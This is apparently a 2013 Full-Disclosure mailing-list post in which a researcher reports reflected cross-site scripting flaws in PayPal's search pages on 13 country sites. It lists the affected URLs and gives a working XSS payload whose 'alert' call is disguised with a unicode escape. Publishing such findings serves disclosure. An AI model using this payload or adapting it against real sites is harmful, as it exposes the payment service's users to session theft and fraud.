[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] 13 more XSS on Paypal
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] 13 more XSS on Paypal
- From: John Parker <unownsec@xxxxxxxxx>
- Date: Tue, 28 May 2013 12:58:28 +0530
Dear Sir,
I recently found out 13 more XSS vulnerabilities and Paypal shows no
response. I am not a bad guy. But please make them aware about this issue
before any skid play with this.
Regards,
Un0wn_X
Hello I saw about the paypal XSS vulnerability and I researched more and more.
I found out that 13 more countries are affected with this xss attack.
https://www.paypal.com/ch/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/nl/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/be/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/jp/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/cn/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/fr/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ca/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/es/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/uk/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/pl/cgi-bin/webscr?cmd=_sitewide-search
XSS Payload: <img src="x:gif" onerror="window['al\u0065rt'](/XSS by
Un0wn_X/)"></img>
Image: http://www.anony.ws/i/2013/05/26/NTuWS.png
I reported them and I did not get any reply. Please make them aware about this
vulnerability. I am giving this is out for the awareness
Researcher: Un0wn_X
Email: unonwsec@xxxxxxxxx
Follow @UnownSec
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/